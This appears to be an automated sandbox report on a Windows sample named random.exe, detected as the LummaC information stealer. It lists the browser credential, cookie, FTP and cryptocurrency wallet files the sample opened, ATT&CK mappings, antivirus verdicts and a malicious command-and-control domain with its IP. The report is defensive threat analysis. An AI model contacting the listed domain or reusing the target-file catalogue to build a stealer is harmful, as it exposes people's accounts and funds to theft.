            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1408039959.0000000000691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1378752783.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1378704518.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1378752783.0000000000691000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: random.exe PID: 6660, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: random.exe PID: 6660, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		44
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		851
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory44
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol41
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive13
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            random.exe64%VirustotalBrowse
            random.exe47%ReversingLabsWin32.Exploit.LummaC
            random.exe100%AviraTR/Crypt.TPM.Gen

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%Avira URL Cloudsafe
            https://begindecafer.world/QwdZdfEM100%Avira URL Cloudmalware
            https://begindecafer.world/QwdZdfl100%Avira URL Cloudmalware
            https://begindecafer.world/QwdZdfr100%Avira URL Cloudmalware
            https://begindecafer.world/QwdZdfd100%Avira URL Cloudmalware
            https://begindecafer.world/QwdZdfmeek100%Avira URL Cloudmalware
            https://begindecafer.world/QwdZdf100%Avira URL Cloudmalware
            https://begindecafer.world/7(100%Avira URL Cloudmalware
            https://begindecafer.world/QwdZdf.100%Avira URL Cloudmalware
            https://begindecafer.world/100%Avira URL Cloudmalware
            https://begindecafer.world:443/QwdZdf100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            begindecafer.world
            		188.114.97.3
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://begindecafer.world/QwdZdffalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/ac/?q=random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYirandom.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/chrome_newtabv20-random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.rootca1.amazontrust.com/rootca1.crl0random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://ac.ecosia.org?q=random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://begindecafer.world/QwdZdfrrandom.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1374694609.00000000051A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://ocsp.rootca1.amazontrust.com0:random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://begindecafer.world/QwdZdfEMrandom.exe, 00000000.00000002.1501319933.00000000006EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://begindecafer.world/7(random.exe, 00000000.00000002.1501474759.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1500134553.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499918795.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgrandom.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrandom.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icorandom.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/v20random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://begindecafer.world/QwdZdfdrandom.exe, 00000000.00000003.1499733536.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1432146445.00000000051A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgrandom.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://x1.c.lencr.org/0random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://x1.i.lencr.org/0random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://begindecafer.world/QwdZdflrandom.exe, 00000000.00000003.1413321325.0000000000664000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrandom.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://begindecafer.world/QwdZdf.random.exe, 00000000.00000003.1499960717.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501061112.0000000000691000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://support.mozilla.org/products/firefoxgro.allrandom.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.mozilla.orrandom.exe, 00000000.00000003.1343009956.00000000051DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://begindecafer.world/QwdZdfmeekrandom.exe, 00000000.00000003.1407842638.00000000051A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://gemini.google.com/app?q=random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://begindecafer.world/random.exe, 00000000.00000003.1413175912.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501474759.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1432606849.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411599231.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1407976823.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1412524430.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1500134553.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499918795.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctarandom.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
